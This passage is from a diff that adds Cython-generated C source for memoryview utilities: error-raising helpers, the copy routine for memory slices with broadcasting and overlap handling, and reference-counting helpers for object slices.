+ #endif + __Pyx_RefNannySetupContext("_err_dim", 0); + __Pyx_INCREF(__pyx_v_msg); + + /* "View.MemoryView":1253 + * @cname('__pyx_memoryview_err_dim') + * cdef int _err_dim(PyObject *error, str msg, int dim) except -1 with gil: + * raise error, msg % dim # <<<<<<<<<<<<<< + * + * @cname('__pyx_memoryview_err') + */ + __pyx_t_1 = __Pyx_PyInt_From_int(__pyx_v_dim); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 1253, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_2 = __Pyx_PyString_FormatSafe(__pyx_v_msg, __pyx_t_1); if (unlikely(!__pyx_t_2)) __PYX_ERR(1, 1253, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __Pyx_Raise(((PyObject *)__pyx_v_error), __pyx_t_2, 0, 0); + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + __PYX_ERR(1, 1253, __pyx_L1_error) + + /* "View.MemoryView":1252 + * + * @cname('__pyx_memoryview_err_dim') + * cdef int _err_dim(PyObject *error, str msg, int dim) except -1 with gil: # <<<<<<<<<<<<<< + * raise error, msg % dim + * + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_XDECREF(__pyx_t_2); + __Pyx_AddTraceback("View.MemoryView._err_dim", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = -1; + __Pyx_XDECREF(__pyx_v_msg); + __Pyx_RefNannyFinishContext(); + #ifdef WITH_THREAD + __Pyx_PyGILState_Release(__pyx_gilstate_save); + #endif + return __pyx_r; +} + +/* "View.MemoryView":1256 + * + * @cname('__pyx_memoryview_err') + * cdef int _err(PyObject *error, str msg) except -1 with gil: # <<<<<<<<<<<<<< + * raise error, msg + * + */ + +static int __pyx_memoryview_err(PyObject *__pyx_v_error, PyObject *__pyx_v_msg) { + int __pyx_r; + __Pyx_RefNannyDeclarations + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + #ifdef WITH_THREAD + PyGILState_STATE __pyx_gilstate_save = __Pyx_PyGILState_Ensure(); + #endif + __Pyx_RefNannySetupContext("_err", 0); + __Pyx_INCREF(__pyx_v_msg); + + /* "View.MemoryView":1257 + * @cname('__pyx_memoryview_err') + * cdef int _err(PyObject *error, str msg) except -1 with gil: + * raise error, msg # <<<<<<<<<<<<<< + * + * @cname('__pyx_memoryview_err_no_memory') + */ + __Pyx_Raise(((PyObject *)__pyx_v_error), __pyx_v_msg, 0, 0); + __PYX_ERR(1, 1257, __pyx_L1_error) + + /* "View.MemoryView":1256 + * + * @cname('__pyx_memoryview_err') + * cdef int _err(PyObject *error, str msg) except -1 with gil: # <<<<<<<<<<<<<< + * raise error, msg + * + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_AddTraceback("View.MemoryView._err", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = -1; + __Pyx_XDECREF(__pyx_v_msg); + __Pyx_RefNannyFinishContext(); + #ifdef WITH_THREAD + __Pyx_PyGILState_Release(__pyx_gilstate_save); + #endif + return __pyx_r; +} + +/* "View.MemoryView":1260 + * + * @cname('__pyx_memoryview_err_no_memory') + * cdef int _err_no_memory() except -1 with gil: # <<<<<<<<<<<<<< + * raise MemoryError + * + */ + +static int __pyx_memoryview_err_no_memory(void) { + int __pyx_r; + __Pyx_RefNannyDeclarations + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + #ifdef WITH_THREAD + PyGILState_STATE __pyx_gilstate_save = __Pyx_PyGILState_Ensure(); + #endif + __Pyx_RefNannySetupContext("_err_no_memory", 0); + + /* "View.MemoryView":1261 + * @cname('__pyx_memoryview_err_no_memory') + * cdef int _err_no_memory() except -1 with gil: + * raise MemoryError # <<<<<<<<<<<<<< + * + * + */ + PyErr_NoMemory(); __PYX_ERR(1, 1261, __pyx_L1_error) + + /* "View.MemoryView":1260 + * + * @cname('__pyx_memoryview_err_no_memory') + * cdef int _err_no_memory() except -1 with gil: # <<<<<<<<<<<<<< + * raise MemoryError + * + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_AddTraceback("View.MemoryView._err_no_memory", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = -1; + __Pyx_RefNannyFinishContext(); + #ifdef WITH_THREAD + __Pyx_PyGILState_Release(__pyx_gilstate_save); + #endif + return __pyx_r; +} + +/* "View.MemoryView":1265 + * + * @cname('__pyx_memoryview_copy_contents') + * cdef int memoryview_copy_contents(__Pyx_memviewslice src, # <<<<<<<<<<<<<< + * __Pyx_memviewslice dst, + * int src_ndim, int dst_ndim, + */ + +static int __pyx_memoryview_copy_contents(__Pyx_memviewslice __pyx_v_src, __Pyx_memviewslice __pyx_v_dst, int __pyx_v_src_ndim, int __pyx_v_dst_ndim, int __pyx_v_dtype_is_object) { + void *__pyx_v_tmpdata; + size_t __pyx_v_itemsize; + int __pyx_v_i; + char __pyx_v_order; + int __pyx_v_broadcasting; + int __pyx_v_direct_copy; + __Pyx_memviewslice __pyx_v_tmp; + int __pyx_v_ndim; + int __pyx_r; + Py_ssize_t __pyx_t_1; + int __pyx_t_2; + int __pyx_t_3; + int __pyx_t_4; + int __pyx_t_5; + int __pyx_t_6; + void *__pyx_t_7; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + #ifdef WITH_THREAD + PyGILState_STATE __pyx_gilstate_save; + #endif + + /* "View.MemoryView":1273 + * Check for overlapping memory and verify the shapes. + * """ + * cdef void *tmpdata = NULL # <<<<<<<<<<<<<< + * cdef size_t itemsize = src.memview.view.itemsize + * cdef int i + */ + __pyx_v_tmpdata = NULL; + + /* "View.MemoryView":1274 + * """ + * cdef void *tmpdata = NULL + * cdef size_t itemsize = src.memview.view.itemsize # <<<<<<<<<<<<<< + * cdef int i + * cdef char order = get_best_order(&src, src_ndim) + */ + __pyx_t_1 = __pyx_v_src.memview->view.itemsize; + __pyx_v_itemsize = __pyx_t_1; + + /* "View.MemoryView":1276 + * cdef size_t itemsize = src.memview.view.itemsize + * cdef int i + * cdef char order = get_best_order(&src, src_ndim) # <<<<<<<<<<<<<< + * cdef bint broadcasting = False + * cdef bint direct_copy = False + */ + __pyx_v_order = __pyx_get_best_slice_order((&__pyx_v_src), __pyx_v_src_ndim); + + /* "View.MemoryView":1277 + * cdef int i + * cdef char order = get_best_order(&src, src_ndim) + * cdef bint broadcasting = False # <<<<<<<<<<<<<< + * cdef bint direct_copy = False + * cdef __Pyx_memviewslice tmp + */ + __pyx_v_broadcasting = 0; + + /* "View.MemoryView":1278 + * cdef char order = get_best_order(&src, src_ndim) + * cdef bint broadcasting = False + * cdef bint direct_copy = False # <<<<<<<<<<<<<< + * cdef __Pyx_memviewslice tmp + * + */ + __pyx_v_direct_copy = 0; + + /* "View.MemoryView":1281 + * cdef __Pyx_memviewslice tmp + * + * if src_ndim < dst_ndim: # <<<<<<<<<<<<<< + * broadcast_leading(&src, src_ndim, dst_ndim) + * elif dst_ndim < src_ndim: + */ + __pyx_t_2 = (__pyx_v_src_ndim < __pyx_v_dst_ndim); + if (__pyx_t_2) { + + /* "View.MemoryView":1282 + * + * if src_ndim < dst_ndim: + * broadcast_leading(&src, src_ndim, dst_ndim) # <<<<<<<<<<<<<< + * elif dst_ndim < src_ndim: + * broadcast_leading(&dst, dst_ndim, src_ndim) + */ + __pyx_memoryview_broadcast_leading((&__pyx_v_src), __pyx_v_src_ndim, __pyx_v_dst_ndim); + + /* "View.MemoryView":1281 + * cdef __Pyx_memviewslice tmp + * + * if src_ndim < dst_ndim: # <<<<<<<<<<<<<< + * broadcast_leading(&src, src_ndim, dst_ndim) + * elif dst_ndim < src_ndim: + */ + goto __pyx_L3; + } + + /* "View.MemoryView":1283 + * if src_ndim < dst_ndim: + * broadcast_leading(&src, src_ndim, dst_ndim) + * elif dst_ndim < src_ndim: # <<<<<<<<<<<<<< + * broadcast_leading(&dst, dst_ndim, src_ndim) + * + */ + __pyx_t_2 = (__pyx_v_dst_ndim < __pyx_v_src_ndim); + if (__pyx_t_2) { + + /* "View.MemoryView":1284 + * broadcast_leading(&src, src_ndim, dst_ndim) + * elif dst_ndim < src_ndim: + * broadcast_leading(&dst, dst_ndim, src_ndim) # <<<<<<<<<<<<<< + * + * cdef int ndim = max(src_ndim, dst_ndim) + */ + __pyx_memoryview_broadcast_leading((&__pyx_v_dst), __pyx_v_dst_ndim, __pyx_v_src_ndim); + + /* "View.MemoryView":1283 + * if src_ndim < dst_ndim: + * broadcast_leading(&src, src_ndim, dst_ndim) + * elif dst_ndim < src_ndim: # <<<<<<<<<<<<<< + * broadcast_leading(&dst, dst_ndim, src_ndim) + * + */ + } + __pyx_L3:; + + /* "View.MemoryView":1286 + * broadcast_leading(&dst, dst_ndim, src_ndim) + * + * cdef int ndim = max(src_ndim, dst_ndim) # <<<<<<<<<<<<<< + * + * for i in range(ndim): + */ + __pyx_t_3 = __pyx_v_dst_ndim; + __pyx_t_4 = __pyx_v_src_ndim; + if ((__pyx_t_3 > __pyx_t_4)) { + __pyx_t_5 = __pyx_t_3; + } else { + __pyx_t_5 = __pyx_t_4; + } + __pyx_v_ndim = __pyx_t_5; + + /* "View.MemoryView":1288 + * cdef int ndim = max(src_ndim, dst_ndim) + * + * for i in range(ndim): # <<<<<<<<<<<<<< + * if src.shape[i] != dst.shape[i]: + * if src.shape[i] == 1: + */ + __pyx_t_5 = __pyx_v_ndim; + __pyx_t_3 = __pyx_t_5; + for (__pyx_t_4 = 0; __pyx_t_4 < __pyx_t_3; __pyx_t_4+=1) { + __pyx_v_i = __pyx_t_4; + + /* "View.MemoryView":1289 + * + * for i in range(ndim): + * if src.shape[i] != dst.shape[i]: # <<<<<<<<<<<<<< + * if src.shape[i] == 1: + * broadcasting = True + */ + __pyx_t_2 = ((__pyx_v_src.shape[__pyx_v_i]) != (__pyx_v_dst.shape[__pyx_v_i])); + if (__pyx_t_2) { + + /* "View.MemoryView":1290 + * for i in range(ndim): + * if src.shape[i] != dst.shape[i]: + * if src.shape[i] == 1: # <<<<<<<<<<<<<< + * broadcasting = True + * src.strides[i] = 0 + */ + __pyx_t_2 = ((__pyx_v_src.shape[__pyx_v_i]) == 1); + if (__pyx_t_2) { + + /* "View.MemoryView":1291 + * if src.shape[i] != dst.shape[i]: + * if src.shape[i] == 1: + * broadcasting = True # <<<<<<<<<<<<<< + * src.strides[i] = 0 + * else: + */ + __pyx_v_broadcasting = 1; + + /* "View.MemoryView":1292 + * if src.shape[i] == 1: + * broadcasting = True + * src.strides[i] = 0 # <<<<<<<<<<<<<< + * else: + * _err_extents(i, dst.shape[i], src.shape[i]) + */ + (__pyx_v_src.strides[__pyx_v_i]) = 0; + + /* "View.MemoryView":1290 + * for i in range(ndim): + * if src.shape[i] != dst.shape[i]: + * if src.shape[i] == 1: # <<<<<<<<<<<<<< + * broadcasting = True + * src.strides[i] = 0 + */ + goto __pyx_L7; + } + + /* "View.MemoryView":1294 + * src.strides[i] = 0 + * else: + * _err_extents(i, dst.shape[i], src.shape[i]) # <<<<<<<<<<<<<< + * + * if src.suboffsets[i] >= 0: + */ + /*else*/ { + __pyx_t_6 = __pyx_memoryview_err_extents(__pyx_v_i, (__pyx_v_dst.shape[__pyx_v_i]), (__pyx_v_src.shape[__pyx_v_i])); if (unlikely(__pyx_t_6 == ((int)-1))) __PYX_ERR(1, 1294, __pyx_L1_error) + } + __pyx_L7:; + + /* "View.MemoryView":1289 + * + * for i in range(ndim): + * if src.shape[i] != dst.shape[i]: # <<<<<<<<<<<<<< + * if src.shape[i] == 1: + * broadcasting = True + */ + } + + /* "View.MemoryView":1296 + * _err_extents(i, dst.shape[i], src.shape[i]) + * + * if src.suboffsets[i] >= 0: # <<<<<<<<<<<<<< + * _err_dim(PyExc_ValueError, "Dimension %d is not direct", i) + * + */ + __pyx_t_2 = ((__pyx_v_src.suboffsets[__pyx_v_i]) >= 0); + if (__pyx_t_2) { + + /* "View.MemoryView":1297 + * + * if src.suboffsets[i] >= 0: + * _err_dim(PyExc_ValueError, "Dimension %d is not direct", i) # <<<<<<<<<<<<<< + * + * if slices_overlap(&src, &dst, ndim, itemsize): + */ + __pyx_t_6 = __pyx_memoryview_err_dim(PyExc_ValueError, __pyx_kp_s_Dimension_d_is_not_direct, __pyx_v_i); if (unlikely(__pyx_t_6 == ((int)-1))) __PYX_ERR(1, 1297, __pyx_L1_error) + + /* "View.MemoryView":1296 + * _err_extents(i, dst.shape[i], src.shape[i]) + * + * if src.suboffsets[i] >= 0: # <<<<<<<<<<<<<< + * _err_dim(PyExc_ValueError, "Dimension %d is not direct", i) + * + */ + } + } + + /* "View.MemoryView":1299 + * _err_dim(PyExc_ValueError, "Dimension %d is not direct", i) + * + * if slices_overlap(&src, &dst, ndim, itemsize): # <<<<<<<<<<<<<< + * + * if not slice_is_contig(src, order, ndim): + */ + __pyx_t_2 = __pyx_slices_overlap((&__pyx_v_src), (&__pyx_v_dst), __pyx_v_ndim, __pyx_v_itemsize); + if (__pyx_t_2) { + + /* "View.MemoryView":1301 + * if slices_overlap(&src, &dst, ndim, itemsize): + * + * if not slice_is_contig(src, order, ndim): # <<<<<<<<<<<<<< + * order = get_best_order(&dst, ndim) + * + */ + __pyx_t_2 = (!__pyx_memviewslice_is_contig(__pyx_v_src, __pyx_v_order, __pyx_v_ndim)); + if (__pyx_t_2) { + + /* "View.MemoryView":1302 + * + * if not slice_is_contig(src, order, ndim): + * order = get_best_order(&dst, ndim) # <<<<<<<<<<<<<< + * + * tmpdata = copy_data_to_temp(&src, &tmp, order, ndim) + */ + __pyx_v_order = __pyx_get_best_slice_order((&__pyx_v_dst), __pyx_v_ndim); + + /* "View.MemoryView":1301 + * if slices_overlap(&src, &dst, ndim, itemsize): + * + * if not slice_is_contig(src, order, ndim): # <<<<<<<<<<<<<< + * order = get_best_order(&dst, ndim) + * + */ + } + + /* "View.MemoryView":1304 + * order = get_best_order(&dst, ndim) + * + * tmpdata = copy_data_to_temp(&src, &tmp, order, ndim) # <<<<<<<<<<<<<< + * src = tmp + * + */ + __pyx_t_7 = __pyx_memoryview_copy_data_to_temp((&__pyx_v_src), (&__pyx_v_tmp), __pyx_v_order, __pyx_v_ndim); if (unlikely(__pyx_t_7 == ((void *)NULL))) __PYX_ERR(1, 1304, __pyx_L1_error) + __pyx_v_tmpdata = __pyx_t_7; + + /* "View.MemoryView":1305 + * + * tmpdata = copy_data_to_temp(&src, &tmp, order, ndim) + * src = tmp # <<<<<<<<<<<<<< + * + * if not broadcasting: + */ + __pyx_v_src = __pyx_v_tmp; + + /* "View.MemoryView":1299 + * _err_dim(PyExc_ValueError, "Dimension %d is not direct", i) + * + * if slices_overlap(&src, &dst, ndim, itemsize): # <<<<<<<<<<<<<< + * + * if not slice_is_contig(src, order, ndim): + */ + } + + /* "View.MemoryView":1307 + * src = tmp + * + * if not broadcasting: # <<<<<<<<<<<<<< + * + * + */ + __pyx_t_2 = (!__pyx_v_broadcasting); + if (__pyx_t_2) { + + /* "View.MemoryView":1310 + * + * + * if slice_is_contig(src, 'C', ndim): # <<<<<<<<<<<<<< + * direct_copy = slice_is_contig(dst, 'C', ndim) + * elif slice_is_contig(src, 'F', ndim): + */ + __pyx_t_2 = __pyx_memviewslice_is_contig(__pyx_v_src, 'C', __pyx_v_ndim); + if (__pyx_t_2) { + + /* "View.MemoryView":1311 + * + * if slice_is_contig(src, 'C', ndim): + * direct_copy = slice_is_contig(dst, 'C', ndim) # <<<<<<<<<<<<<< + * elif slice_is_contig(src, 'F', ndim): + * direct_copy = slice_is_contig(dst, 'F', ndim) + */ + __pyx_v_direct_copy = __pyx_memviewslice_is_contig(__pyx_v_dst, 'C', __pyx_v_ndim); + + /* "View.MemoryView":1310 + * + * + * if slice_is_contig(src, 'C', ndim): # <<<<<<<<<<<<<< + * direct_copy = slice_is_contig(dst, 'C', ndim) + * elif slice_is_contig(src, 'F', ndim): + */ + goto __pyx_L12; + } + + /* "View.MemoryView":1312 + * if slice_is_contig(src, 'C', ndim): + * direct_copy = slice_is_contig(dst, 'C', ndim) + * elif slice_is_contig(src, 'F', ndim): # <<<<<<<<<<<<<< + * direct_copy = slice_is_contig(dst, 'F', ndim) + * + */ + __pyx_t_2 = __pyx_memviewslice_is_contig(__pyx_v_src, 'F', __pyx_v_ndim); + if (__pyx_t_2) { + + /* "View.MemoryView":1313 + * direct_copy = slice_is_contig(dst, 'C', ndim) + * elif slice_is_contig(src, 'F', ndim): + * direct_copy = slice_is_contig(dst, 'F', ndim) # <<<<<<<<<<<<<< + * + * if direct_copy: + */ + __pyx_v_direct_copy = __pyx_memviewslice_is_contig(__pyx_v_dst, 'F', __pyx_v_ndim); + + /* "View.MemoryView":1312 + * if slice_is_contig(src, 'C', ndim): + * direct_copy = slice_is_contig(dst, 'C', ndim) + * elif slice_is_contig(src, 'F', ndim): # <<<<<<<<<<<<<< + * direct_copy = slice_is_contig(dst, 'F', ndim) + * + */ + } + __pyx_L12:; + + /* "View.MemoryView":1315 + * direct_copy = slice_is_contig(dst, 'F', ndim) + * + * if direct_copy: # <<<<<<<<<<<<<< + * + * refcount_copying(&dst, dtype_is_object, ndim, inc=False) + */ + if (__pyx_v_direct_copy) { + + /* "View.MemoryView":1317 + * if direct_copy: + * + * refcount_copying(&dst, dtype_is_object, ndim, inc=False) # <<<<<<<<<<<<<< + * memcpy(dst.data, src.data, slice_get_size(&src, ndim)) + * refcount_copying(&dst, dtype_is_object, ndim, inc=True) + */ + __pyx_memoryview_refcount_copying((&__pyx_v_dst), __pyx_v_dtype_is_object, __pyx_v_ndim, 0); + + /* "View.MemoryView":1318 + * + * refcount_copying(&dst, dtype_is_object, ndim, inc=False) + * memcpy(dst.data, src.data, slice_get_size(&src, ndim)) # <<<<<<<<<<<<<< + * refcount_copying(&dst, dtype_is_object, ndim, inc=True) + * free(tmpdata) + */ + (void)(memcpy(__pyx_v_dst.data, __pyx_v_src.data, __pyx_memoryview_slice_get_size((&__pyx_v_src), __pyx_v_ndim))); + + /* "View.MemoryView":1319 + * refcount_copying(&dst, dtype_is_object, ndim, inc=False) + * memcpy(dst.data, src.data, slice_get_size(&src, ndim)) + * refcount_copying(&dst, dtype_is_object, ndim, inc=True) # <<<<<<<<<<<<<< + * free(tmpdata) + * return 0 + */ + __pyx_memoryview_refcount_copying((&__pyx_v_dst), __pyx_v_dtype_is_object, __pyx_v_ndim, 1); + + /* "View.MemoryView":1320 + * memcpy(dst.data, src.data, slice_get_size(&src, ndim)) + * refcount_copying(&dst, dtype_is_object, ndim, inc=True) + * free(tmpdata) # <<<<<<<<<<<<<< + * return 0 + * + */ + free(__pyx_v_tmpdata); + + /* "View.MemoryView":1321 + * refcount_copying(&dst, dtype_is_object, ndim, inc=True) + * free(tmpdata) + * return 0 # <<<<<<<<<<<<<< + * + * if order == 'F' == get_best_order(&dst, ndim): + */ + __pyx_r = 0; + goto __pyx_L0; + + /* "View.MemoryView":1315 + * direct_copy = slice_is_contig(dst, 'F', ndim) + * + * if direct_copy: # <<<<<<<<<<<<<< + * + * refcount_copying(&dst, dtype_is_object, ndim, inc=False) + */ + } + + /* "View.MemoryView":1307 + * src = tmp + * + * if not broadcasting: # <<<<<<<<<<<<<< + * + * + */ + } + + /* "View.MemoryView":1323 + * return 0 + * + * if order == 'F' == get_best_order(&dst, ndim): # <<<<<<<<<<<<<< + * + * + */ + __pyx_t_2 = (__pyx_v_order == 'F'); + if (__pyx_t_2) { + __pyx_t_2 = ('F' == __pyx_get_best_slice_order((&__pyx_v_dst), __pyx_v_ndim)); + } + if (__pyx_t_2) { + + /* "View.MemoryView":1326 + * + * + * transpose_memslice(&src) # <<<<<<<<<<<<<< + * transpose_memslice(&dst) + * + */ + __pyx_t_5 = __pyx_memslice_transpose((&__pyx_v_src)); if (unlikely(__pyx_t_5 == ((int)-1))) __PYX_ERR(1, 1326, __pyx_L1_error) + + /* "View.MemoryView":1327 + * + * transpose_memslice(&src) + * transpose_memslice(&dst) # <<<<<<<<<<<<<< + * + * refcount_copying(&dst, dtype_is_object, ndim, inc=False) + */ + __pyx_t_5 = __pyx_memslice_transpose((&__pyx_v_dst)); if (unlikely(__pyx_t_5 == ((int)-1))) __PYX_ERR(1, 1327, __pyx_L1_error) + + /* "View.MemoryView":1323 + * return 0 + * + * if order == 'F' == get_best_order(&dst, ndim): # <<<<<<<<<<<<<< + * + * + */ + } + + /* "View.MemoryView":1329 + * transpose_memslice(&dst) + * + * refcount_copying(&dst, dtype_is_object, ndim, inc=False) # <<<<<<<<<<<<<< + * copy_strided_to_strided(&src, &dst, ndim, itemsize) + * refcount_copying(&dst, dtype_is_object, ndim, inc=True) + */ + __pyx_memoryview_refcount_copying((&__pyx_v_dst), __pyx_v_dtype_is_object, __pyx_v_ndim, 0); + + /* "View.MemoryView":1330 + * + * refcount_copying(&dst, dtype_is_object, ndim, inc=False) + * copy_strided_to_strided(&src, &dst, ndim, itemsize) # <<<<<<<<<<<<<< + * refcount_copying(&dst, dtype_is_object, ndim, inc=True) + * + */ + copy_strided_to_strided((&__pyx_v_src), (&__pyx_v_dst), __pyx_v_ndim, __pyx_v_itemsize); + + /* "View.MemoryView":1331 + * refcount_copying(&dst, dtype_is_object, ndim, inc=False) + * copy_strided_to_strided(&src, &dst, ndim, itemsize) + * refcount_copying(&dst, dtype_is_object, ndim, inc=True) # <<<<<<<<<<<<<< + * + * free(tmpdata) + */ + __pyx_memoryview_refcount_copying((&__pyx_v_dst), __pyx_v_dtype_is_object, __pyx_v_ndim, 1); + + /* "View.MemoryView":1333 + * refcount_copying(&dst, dtype_is_object, ndim, inc=True) + * + * free(tmpdata) # <<<<<<<<<<<<<< + * return 0 + * + */ + free(__pyx_v_tmpdata); + + /* "View.MemoryView":1334 + * + * free(tmpdata) + * return 0 # <<<<<<<<<<<<<< + * + * @cname('__pyx_memoryview_broadcast_leading') + */ + __pyx_r = 0; + goto __pyx_L0; + + /* "View.MemoryView":1265 + * + * @cname('__pyx_memoryview_copy_contents') + * cdef int memoryview_copy_contents(__Pyx_memviewslice src, # <<<<<<<<<<<<<< + * __Pyx_memviewslice dst, + * int src_ndim, int dst_ndim, + */ + + /* function exit code */ + __pyx_L1_error:; + #ifdef WITH_THREAD + __pyx_gilstate_save = __Pyx_PyGILState_Ensure(); + #endif + __Pyx_AddTraceback("View.MemoryView.memoryview_copy_contents", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = -1; + #ifdef WITH_THREAD + __Pyx_PyGILState_Release(__pyx_gilstate_save); + #endif + __pyx_L0:; + return __pyx_r; +} + +/* "View.MemoryView":1337 + * + * @cname('__pyx_memoryview_broadcast_leading') + * cdef void broadcast_leading(__Pyx_memviewslice *mslice, # <<<<<<<<<<<<<< + * int ndim, + * int ndim_other) noexcept nogil: + */ + +static void __pyx_memoryview_broadcast_leading(__Pyx_memviewslice *__pyx_v_mslice, int __pyx_v_ndim, int __pyx_v_ndim_other) { + int __pyx_v_i; + int __pyx_v_offset; + int __pyx_t_1; + int __pyx_t_2; + int __pyx_t_3; + + /* "View.MemoryView":1341 + * int ndim_other) noexcept nogil: + * cdef int i + * cdef int offset = ndim_other - ndim # <<<<<<<<<<<<<< + * + * for i in range(ndim - 1, -1, -1): + */ + __pyx_v_offset = (__pyx_v_ndim_other - __pyx_v_ndim); + + /* "View.MemoryView":1343 + * cdef int offset = ndim_other - ndim + * + * for i in range(ndim - 1, -1, -1): # <<<<<<<<<<<<<< + * mslice.shape[i + offset] = mslice.shape[i] + * mslice.strides[i + offset] = mslice.strides[i] + */ + for (__pyx_t_1 = (__pyx_v_ndim - 1); __pyx_t_1 > -1; __pyx_t_1-=1) { + __pyx_v_i = __pyx_t_1; + + /* "View.MemoryView":1344 + * + * for i in range(ndim - 1, -1, -1): + * mslice.shape[i + offset] = mslice.shape[i] # <<<<<<<<<<<<<< + * mslice.strides[i + offset] = mslice.strides[i] + * mslice.suboffsets[i + offset] = mslice.suboffsets[i] + */ + (__pyx_v_mslice->shape[(__pyx_v_i + __pyx_v_offset)]) = (__pyx_v_mslice->shape[__pyx_v_i]); + + /* "View.MemoryView":1345 + * for i in range(ndim - 1, -1, -1): + * mslice.shape[i + offset] = mslice.shape[i] + * mslice.strides[i + offset] = mslice.strides[i] # <<<<<<<<<<<<<< + * mslice.suboffsets[i + offset] = mslice.suboffsets[i] + * + */ + (__pyx_v_mslice->strides[(__pyx_v_i + __pyx_v_offset)]) = (__pyx_v_mslice->strides[__pyx_v_i]); + + /* "View.MemoryView":1346 + * mslice.shape[i + offset] = mslice.shape[i] + * mslice.strides[i + offset] = mslice.strides[i] + * mslice.suboffsets[i + offset] = mslice.suboffsets[i] # <<<<<<<<<<<<<< + * + * for i in range(offset): + */ + (__pyx_v_mslice->suboffsets[(__pyx_v_i + __pyx_v_offset)]) = (__pyx_v_mslice->suboffsets[__pyx_v_i]); + } + + /* "View.MemoryView":1348 + * mslice.suboffsets[i + offset] = mslice.suboffsets[i] + * + * for i in range(offset): # <<<<<<<<<<<<<< + * mslice.shape[i] = 1 + * mslice.strides[i] = mslice.strides[0] + */ + __pyx_t_1 = __pyx_v_offset; + __pyx_t_2 = __pyx_t_1; + for (__pyx_t_3 = 0; __pyx_t_3 < __pyx_t_2; __pyx_t_3+=1) { + __pyx_v_i = __pyx_t_3; + + /* "View.MemoryView":1349 + * + * for i in range(offset): + * mslice.shape[i] = 1 # <<<<<<<<<<<<<< + * mslice.strides[i] = mslice.strides[0] + * mslice.suboffsets[i] = -1 + */ + (__pyx_v_mslice->shape[__pyx_v_i]) = 1; + + /* "View.MemoryView":1350 + * for i in range(offset): + * mslice.shape[i] = 1 + * mslice.strides[i] = mslice.strides[0] # <<<<<<<<<<<<<< + * mslice.suboffsets[i] = -1 + * + */ + (__pyx_v_mslice->strides[__pyx_v_i]) = (__pyx_v_mslice->strides[0]); + + /* "View.MemoryView":1351 + * mslice.shape[i] = 1 + * mslice.strides[i] = mslice.strides[0] + * mslice.suboffsets[i] = -1 # <<<<<<<<<<<<<< + * + * + */ + (__pyx_v_mslice->suboffsets[__pyx_v_i]) = -1L; + } + + /* "View.MemoryView":1337 + * + * @cname('__pyx_memoryview_broadcast_leading') + * cdef void broadcast_leading(__Pyx_memviewslice *mslice, # <<<<<<<<<<<<<< + * int ndim, + * int ndim_other) noexcept nogil: + */ + + /* function exit code */ +} + +/* "View.MemoryView":1359 + * + * @cname('__pyx_memoryview_refcount_copying') + * cdef void refcount_copying(__Pyx_memviewslice *dst, bint dtype_is_object, int ndim, bint inc) noexcept nogil: # <<<<<<<<<<<<<< + * + * if dtype_is_object: + */ + +static void __pyx_memoryview_refcount_copying(__Pyx_memviewslice *__pyx_v_dst, int __pyx_v_dtype_is_object, int __pyx_v_ndim, int __pyx_v_inc) { + + /* "View.MemoryView":1361 + * cdef void refcount_copying(__Pyx_memviewslice *dst, bint dtype_is_object, int ndim, bint inc) noexcept nogil: + * + * if dtype_is_object: # <<<<<<<<<<<<<< + * refcount_objects_in_slice_with_gil(dst.data, dst.shape, dst.strides, ndim, inc) + * + */ + if (__pyx_v_dtype_is_object) { + + /* "View.MemoryView":1362 + * + * if dtype_is_object: + * refcount_objects_in_slice_with_gil(dst.data, dst.shape, dst.strides, ndim, inc) # <<<<<<<<<<<<<< + * + * @cname('__pyx_memoryview_refcount_objects_in_slice_with_gil') + */ + __pyx_memoryview_refcount_objects_in_slice_with_gil(__pyx_v_dst->data, __pyx_v_dst->shape, __pyx_v_dst->strides, __pyx_v_ndim, __pyx_v_inc); + + /* "View.MemoryView":1361 + * cdef void refcount_copying(__Pyx_memviewslice *dst, bint dtype_is_object, int ndim, bint inc) noexcept nogil: + * + * if dtype_is_object: # <<<<<<<<<<<<<< + * refcount_objects_in_slice_with_gil(dst.data, dst.shape, dst.strides, ndim, inc) + * + */ + } + + /* "View.MemoryView":1359 + * + * @cname('__pyx_memoryview_refcount_copying') + * cdef void refcount_copying(__Pyx_memviewslice *dst, bint dtype_is_object, int ndim, bint inc) noexcept nogil: # <<<<<<<<<<<<<< + * + * if dtype_is_object: + */ + + /* function exit code */ +} + +/* "View.MemoryView":1365 + * + * @cname('__pyx_memoryview_refcount_objects_in_slice_with_gil') + * cdef void refcount_objects_in_slice_with_gil(char *data, Py_ssize_t *shape, # <<<<<<<<<<<<<< + * Py_ssize_t *strides, int ndim, + * bint inc) noexcept with gil: + */ + +static void __pyx_memoryview_refcount_objects_in_slice_with_gil(char *__pyx_v_data, Py_ssize_t *__pyx_v_shape, Py_ssize_t *__pyx_v_strides, int __pyx_v_ndim, int __pyx_v_inc) { + __Pyx_RefNannyDeclarations + #ifdef WITH_THREAD + PyGILState_STATE __pyx_gilstate_save = __Pyx_PyGILState_Ensure(); + #endif + __Pyx_RefNannySetupContext("refcount_objects_in_slice_with_gil", 0); + + /* "View.MemoryView":1368 + * Py_ssize_t *strides, int ndim, + * bint inc) noexcept with gil: + * refcount_objects_in_slice(data, shape, strides, ndim, inc) # <<<<<<<<<<<<<< + * + * @cname('__pyx_memoryview_refcount_objects_in_slice') + */ + __pyx_memoryview_refcount_objects_in_slice(__pyx_v_data, __pyx_v_shape, __pyx_v_strides, __pyx_v_ndim, __pyx_v_inc); + + /* "View.MemoryView":1365 + * + * @cname('__pyx_memoryview_refcount_objects_in_slice_with_gil') + * cdef void refcount_objects_in_slice_with_gil(char *data, Py_ssize_t *shape, # <<<<<<<<<<<<<< + * Py_ssize_t *strides, int ndim, + * bint inc) noexcept with gil: + */ + + /* function exit code */ + 